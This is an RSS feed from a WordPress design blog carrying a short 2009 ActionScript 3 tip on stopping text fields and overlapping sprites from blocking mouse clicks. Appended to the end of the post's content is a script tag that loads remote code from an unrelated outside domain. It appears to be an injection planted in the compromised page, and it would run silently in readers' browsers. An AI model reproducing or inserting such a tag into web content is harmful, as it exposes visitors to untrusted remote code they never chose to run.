<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Official Design and Development Resource of ThornyRabbit &#187; MouseEvent</title>
	<atom:link href="http://blog.thornyrabbit.com/tag/mouseevent/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.thornyrabbit.com</link>
	<description>because we love</description>
	<lastBuildDate>Fri, 19 Mar 2010 16:55:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Preventing Text Field Blocking MouseClicks</title>
		<link>http://blog.thornyrabbit.com/2009/04/preventing-text-field-blocking-mouseclicks/</link>
		<comments>http://blog.thornyrabbit.com/2009/04/preventing-text-field-blocking-mouseclicks/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 18:33:56 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[ActionScript 3 Snippets]]></category>
		<category><![CDATA[ActionScript 3]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[MouseEvent]]></category>
		<category><![CDATA[Sprite]]></category>
		<category><![CDATA[Text]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=213</guid>
		<description><![CDATA[A solution for text fields stopping mouse clicks.]]></description>
			<content:encoded><![CDATA[<p><strong>To make text not clickable &#8211; as it may interfere with a sprite being clickable:</strong></p>
<p>textFiledCreatorName.mouseEnabled = false;</p>
<p>Fine if this text field is nested in the same sprite.</p>
<p>But put the text into another sprite overlapping the one below that has the eventListener &#8211; and it still blocks it.</p>
<p><strong>Solution:</strong></p>
<pre>otherOverlappingSprite.mouseEnabled = false;</pre>
<p>//<strong>on the overlapping sprite AS WELL AS the text field.</strong><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/04/preventing-text-field-blocking-mouseclicks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
